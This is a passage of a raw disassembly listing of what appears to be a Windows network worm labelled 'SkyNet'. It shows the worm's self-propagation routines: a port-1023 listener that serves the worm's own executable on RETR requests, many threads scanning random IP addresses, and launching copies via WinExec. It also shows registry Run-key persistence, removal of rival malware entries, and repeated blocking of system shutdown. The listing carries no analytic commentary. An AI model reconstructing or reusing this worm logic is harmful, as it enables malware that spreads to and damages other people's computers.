jnz short loc_401C8B
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_18], eax
loc_401C8B: ; CODE XREF: sub_401B59:loc_401C7F�j
cmp edi, 5
jnz short loc_401C9F
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C9F
; ---------------------------------------------------------------------------
loc_401C9C: ; CODE XREF: sub_401B59+111�j
push 6
pop edi
loc_401C9F: ; CODE XREF: sub_401B59+135�j
; sub_401B59+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402770
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C68
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ds:dword_4050F0 ; wsprintfA
add esp, 18h
push 0
push ds:off_4068E0
call sub_402300
pop ecx
push eax
push ds:off_4068E0
jmp loc_401E32
; ---------------------------------------------------------------------------
loc_401CF5: ; CODE XREF: sub_401B59+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz loc_401E37
push 0
push ds:off_4068E4
call sub_402300
pop ecx
push eax
push ds:off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401E14
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call ds:dword_40511C ; htons
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call ds:dword_405120 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401E14
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call ds:dword_405124 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D95
push ebx
call ds:dword_405128 ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401D95: ; CODE XREF: sub_401B59+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call ds:dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call ds:dword_405034 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401E14
lea eax, [ebp+var_2]
push offset dword_4070C8
push eax
call sub_402810
mov ebx, ds:dword_405030
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DDF: ; CODE XREF: sub_401B59+2A6�j
call ebx ; _hread
cmp eax, 1
jnz short loc_401E01
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DDF
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401B59+28B�j
push [ebp+var_8]
call ds:dword_40501C ; _lclose
lea eax, [ebp+var_60]
push eax
call sub_401210
pop ecx
loc_401E14: ; CODE XREF: sub_401B59+1DD�j
; sub_401B59+21B�j ...
push [ebp+var_C]
call ds:dword_405128 ; closesocket
push 0
push ds:off_4068DC
call sub_402300
pop ecx
push eax
push ds:off_4068DC
loc_401E32: ; CODE XREF: sub_401B59+197�j
push [ebp+arg_0]
jmp short loc_401E6D
; ---------------------------------------------------------------------------
loc_401E37: ; CODE XREF: sub_401B59+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401E57
push ebx
call ds:dword_405128 ; closesocket
jmp short loc_401E6F
; ---------------------------------------------------------------------------
loc_401E57: ; CODE XREF: sub_401B59+2F3�j
push 0
push ds:off_4068DC
call sub_402300
pop ecx
push eax
push ds:off_4068DC
loc_401E6C: ; CODE XREF: sub_401B59+8A�j
; sub_401B59+BB�j
push ebx
loc_401E6D: ; CODE XREF: sub_401B59+2DC�j
call esi ; send
loc_401E6F: ; CODE XREF: sub_401B59+2FC�j
cmp [ebp+var_10], 0
jg loc_401B94
push [ebp+arg_0]
call ds:dword_405128 ; closesocket
pop edi
pop esi
loc_401E84: ; CODE XREF: sub_401B59+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B59 endp
; =============== S U B R O U T I N E =======================================
sub_401E8B proc near ; CODE XREF: sub_401B59+119�p
; sub_401B59+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E93: ; CODE XREF: sub_401E8B+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E9D
cmp al, 9
jnz short loc_401EA0
loc_401E9D: ; CODE XREF: sub_401E8B+C�j
inc esi
jmp short loc_401E93
; ---------------------------------------------------------------------------
loc_401EA0: ; CODE XREF: sub_401E8B+10�j
; sub_401E8B+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402900
test eax, eax
pop ecx
jz short loc_401EBB
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401EA0
; ---------------------------------------------------------------------------
loc_401EBB: ; CODE XREF: sub_401E8B+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EC0 proc near ; DATA XREF: sub_4020D9+6E�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call ds:dword_405120 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EE4
loc_401EDC: ; CODE XREF: sub_401EC0+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EE4: ; CODE XREF: sub_401EC0+1A�j
push 3FFh
mov [ebp+var_14], 2
call ds:dword_40511C ; htons
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call ds:dword_405108 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401F1C
push 5
push edi
call ds:dword_40510C ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401F25
loc_401F1C: ; CODE XREF: sub_401EC0+4C�j
push edi
call ds:dword_405128 ; closesocket
jmp short loc_401EDC
; ---------------------------------------------------------------------------
loc_401F25: ; CODE XREF: sub_401EC0+5A�j
; sub_401EC0+89�j
push esi
push esi
push edi
call ds:dword_405110 ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B59
push esi
push esi
call ds:dword_40503C ; CreateThread
push 19h
call ds:dword_40502C ; Sleep
jmp short loc_401F25
sub_401EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F4B proc near ; DATA XREF: sub_4020D9+82�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 45Ch
push ebx
push ebp
push esi
push edi
push 0FFFFFFFFh
call ds:dword_405048 ; GetCurrentThread
push eax
call ds:dword_405044 ; SetThreadPriority
loc_401F64: ; CODE XREF: sub_401F4B+37�j
xor esi, esi
lea eax, [esp+46Ch+var_458]
push esi
push eax
mov [esp+474h+var_458], esi
call ds:dword_4050FC ; InternetGetConnectedState
cmp eax, esi
jnz short loc_401F84
push 19h
call ds:dword_40502C ; Sleep
jmp short loc_401F64
; ---------------------------------------------------------------------------
loc_401F84: ; CODE XREF: sub_401F4B+2D�j
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call ds:dword_405134 ; inet_addr
movsx ebp, al
movsx eax, ah
mov [esp+46Ch+var_45C], eax
cmp ebp, esi
mov eax, 100h
jge short loc_401FAF
add ebp, eax
loc_401FAF: ; CODE XREF: sub_401F4B+60�j
cmp [esp+46Ch+var_45C], esi
jge short loc_401FB9
add [esp+46Ch+var_45C], eax
loc_401FB9: ; CODE XREF: sub_401F4B+68�j
mov edi, ds:dword_4050F0
mov esi, 0FFh
mov ebx, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401FC9: ; CODE XREF: sub_401F4B+189�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_402029
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_40200C
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_402026
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401F4B+9C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_402026: ; CODE XREF: sub_401F4B+BF�j
push ebp
jmp short loc_402055
; ---------------------------------------------------------------------------
loc_402029: ; CODE XREF: sub_401F4B+8C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402055: ; CODE XREF: sub_401F4B+DC�j
lea eax, [esp+47Ch+var_454]
push ebx
push eax
call edi ; wsprintfA
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call ds:dword_405134 ; inet_addr
push eax
call sub_401B1B
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4020CC
lea eax, [esp+46Ch+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_4020CC
lea eax, [esp+46Ch+var_400]
push 400h
push eax
push 0
call ds:dword_405038 ; GetModuleFileNameA
lea eax, [esp+46Ch+var_400]
push offset asc_406A84 ; " "
push eax
call sub_402820
lea eax, [esp+474h+var_454]
push eax
lea eax, [esp+478h+var_400]
push eax
call sub_402820
add esp, 10h
lea eax, [esp+46Ch+var_400]
push 0
push eax
call ds:dword_405040 ; WinExec
loc_4020CC: ; CODE XREF: sub_401F4B+130�j
; sub_401F4B+13F�j
push 19h
call ds:dword_40502C ; Sleep
jmp loc_401FC9
sub_401F4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D9 proc near ; CODE XREF: sub_40292E+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
call ds:dword_405054 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402300
pop ecx
test eax, eax
pop ecx
jbe short loc_40210D
push [ebp+arg_8]
call sub_401A69
pop ecx
push 1
pop eax
locret_402109: ; CODE XREF: sub_4020D9+5F�j
leave
retn 10h
; ---------------------------------------------------------------------------
loc_40210D: ; CODE XREF: sub_4020D9+22�j
push esi
push edi
push 1
call sub_40219B
xor esi, esi
mov [esp+14h+var_14], offset aSkynetnotice ; "SkynetNotice"
push esi
push esi
call ds:dword_405050 ; CreateMutexA
call ds:dword_40504C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_40213A
pop edi
xor eax, eax
pop esi
jmp short locret_402109
; ---------------------------------------------------------------------------
loc_40213A: ; CODE XREF: sub_4020D9+59�j
mov edi, ds:dword_40503C
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EC0
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_402155: ; CODE XREF: sub_4020D9+8C�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F4B
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_402155
xor edi, edi
pop ebx
loc_40216A: ; CODE XREF: sub_4020D9+AA�j
; sub_4020D9+C0�j
push esi
call ds:dword_405008 ; AbortSystemShutdownA
push 3E8h
call ds:dword_40502C ; Sleep
inc edi
cmp edi, 1C20h
jle short loc_40216A
push esi
push offset aSkynet ; "SkyNet"
push offset a1_YourComputer ; "1. Your computer is affected by the MS0"...
push esi
xor edi, edi
call ds:dword_4050F4 ; MessageBoxA
jmp short loc_40216A
sub_4020D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40219B proc near ; CODE XREF: sub_4020D9+38�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
push edi
lea eax, [ebp+var_824]
push esi
push eax
push 0
call ds:dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call ds:dword_40505C ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402300
cmp [ebp+eax+var_425], 5Ch
pop ecx
jz short loc_4021F3
lea eax, [ebp+var_424]
push offset asc_406C50 ; "\\"
push eax
call sub_402820
pop ecx
pop ecx
loc_4021F3: ; CODE XREF: sub_40219B+43�j
push ds:off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402820
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_402223
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call ds:dword_405058 ; CopyFileA
loc_402223: ; CODE XREF: sub_40219B+70�j
lea eax, [ebp+var_4]
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push eax
push esi
push 80000002h
call ds:dword_40500C ; RegOpenKeyA
lea eax, [ebp+var_424]
push eax
call sub_402300
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push ds:off_4068C8
push [ebp+var_4]
call ds:dword_405004 ; RegSetValueExA
push [ebp+var_4]
call ds:dword_405000 ; RegCloseKey
push offset aSsgrate_exe ; "ssgrate.exe"
mov edi, 80000001h
push esi
push edi
call sub_401AED
push offset aDrvsys_exe ; "drvsys.exe"
push esi
push edi
call sub_401AED
push offset aDrvddll_exe ; "Drvddll_exe"
push esi
push edi
call sub_401AED
add esp, 24h
pop edi
pop esi
leave
retn
sub_40219B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4022F3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4022E7
neg ecx
and ecx, 3
jz short loc_4022C9
sub edx, ecx
loc_4022C3: ; CODE XREF: sub_4022A0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4022C3
loc_4022C9: ; CODE XREF: sub_4022A0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4022E7
rep stosd
test edx, edx
jz short loc_4022ED
loc_4022E7: ; CODE XREF: sub_4022A0+18�j
; sub_4022A0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4022E7
loc_4022ED: ; CODE XREF: sub_4022A0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4022F3: ; CODE XREF: sub_4022A0+A�j
mov eax, [esp+arg_0]
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402300 proc near ; CODE XREF: sub_401210+2C�p
; sub_401210+46�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402320
loc_40230C: ; CODE XREF: sub_402300+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402353
test ecx, 3
jnz short loc_40230C
add eax, 0
loc_402320: ; CODE XREF: sub_402300+A�j
; sub_402300+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402320
mov eax, [ecx-4]
test al, al
jz short loc_402371
test ah, ah
jz short loc_402367
test eax, 0FF0000h
jz short loc_40235D
test eax, 0FF000000h
jz short loc_402353
jmp short loc_402320
; ---------------------------------------------------------------------------
loc_402353: ; CODE XREF: sub_402300+11�j
; sub_402300+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40235D: ; CODE XREF: sub_402300+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402367: ; CODE XREF: sub_402300+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402371: ; CODE XREF: sub_402300+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402380 proc near ; CODE XREF: sub_40137D+59�p
; sub_40137D+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4023A0
cmp edi, eax
jb loc_402518
loc_4023A0: ; CODE XREF: sub_402380+16�j
test edi, 3
jnz short loc_4023BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp ds:off_4024C8[edx*4]
; ---------------------------------------------------------------------------
loc_4023BC: ; CODE XREF: sub_402380+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4023D4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4023DC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4023D4: ; CODE XREF: sub_402380+46�j
jmp dword ptr ds:loc_4024D8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4023DC: ; CODE XREF: sub_402380+31�j
; sub_402380+8E�j ...
jmp ds:off_40245C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4023F0
dd offset loc_40241C
dd offset loc_402440
; ---------------------------------------------------------------------------
loc_4023F0: ; DATA XREF: sub_402380+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp ds:off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40241C: ; DATA XREF: sub_402380+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp ds:off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402440: ; DATA XREF: sub_402380+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp ds:off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40245C dd offset loc_4024BF ; DATA XREF: sub_402380:loc_4023DC�r
dd offset loc_4024AC
dd offset loc_4024A4
dd offset loc_40249C
dd offset loc_402494
dd offset loc_40248C
dd offset loc_402484
dd offset loc_40247C
; ---------------------------------------------------------------------------
loc_40247C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402484: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40248C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_402494: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40249C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4024A4: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4024AC: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4024BF: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380:off_40245C�o
jmp ds:off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4024C8 dd offset loc_4024D8 ; DATA XREF: sub_402380+35�r
; sub_402380+92�r ...
dd offset loc_4024E0
dd offset loc_4024EC
dd offset loc_402500
; ---------------------------------------------------------------------------
loc_4024D8: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4024E0: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4024EC: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402500: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402518: ; CODE XREF: sub_402380+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40254C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp ds:off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402540: ; CODE XREF: sub_402380+1B1�j
; sub_402380+208�j ...
neg ecx
jmp ds:off_402610[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40254C: ; CODE XREF: sub_402380+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402564
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_402564+4[eax*4]
; ---------------------------------------------------------------------------
loc_402564: ; CODE XREF: sub_402380+1D6�j
; DATA XREF: sub_402380+1DD�r
jmp ds:off_402660[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402577+1
; ---------------------------------------------------------------------------
cwde
and eax, 25C00040h
inc eax
loc_402577: ; DATA XREF: sub_402380+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp ds:off_402660[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp ds:off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402540
std
rep movsd
cld
jmp ds:off_402660[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402614
dd offset loc_40261C
dd offset loc_402624
dd offset loc_40262C
dd offset loc_402634
dd offset loc_40263C
dd offset loc_402644
off_402610 dd offset loc_402657 ; DATA XREF: sub_402380+1C2�r
; ---------------------------------------------------------------------------
loc_402614: ; DATA XREF: sub_402380+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40261C: ; DATA XREF: sub_402380+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402624: ; DATA XREF: sub_402380+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40262C: ; DATA XREF: sub_402380+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402634: ; DATA XREF: sub_402380+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40263C: ; DATA XREF: sub_402380+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402644: ; DATA XREF: sub_402380+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402657: ; CODE XREF: sub_402380+1C2�j
; DATA XREF: sub_402380:off_402610�o
jmp ds:off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402660 dd offset loc_402670 ; DATA XREF: sub_402380+1B7�r
; sub_402380:loc_402564�r ...
dd offset loc_402678
dd offset loc_402688
dd offset loc_40269C
; ---------------------------------------------------------------------------
loc_402670: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402678: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402688: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40269C: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026C0 proc near ; CODE XREF: sub_401583+8�p
; sub_40380C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4026E0
loc_4026CC: ; CODE XREF: sub_4026C0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4026CC
loc_4026E0: ; CODE XREF: sub_4026C0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4026C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026F0 proc near ; CODE XREF: sub_401A69+2D�p
; sub_401A69+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40276A
mov dh, [ecx+1]
test dh, dh
jz short loc_402757
loc_402708: ; CODE XREF: sub_4026F0+52�j
; sub_4026F0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40272A
test al, al
jz short loc_402724
loc_402719: ; CODE XREF: sub_4026F0+32�j
mov al, [esi]
inc esi
loc_40271C: ; CODE XREF: sub_4026F0+3F�j
cmp al, dl
jz short loc_40272A
test al, al
jnz short loc_402719
loc_402724: ; CODE XREF: sub_4026F0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40272A: ; CODE XREF: sub_4026F0+23�j
; sub_4026F0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40271C
lea edi, [esi-1]
loc_402734: ; CODE XREF: sub_4026F0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402763
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402708
mov al, [ecx+3]
test al, al
jz short loc_402763
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402734
jmp short loc_402708
; ---------------------------------------------------------------------------
loc_402757: ; CODE XREF: sub_4026F0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402A86
; ---------------------------------------------------------------------------
loc_402763: ; CODE XREF: sub_4026F0+49�j
; sub_4026F0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40276A: ; CODE XREF: sub_4026F0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
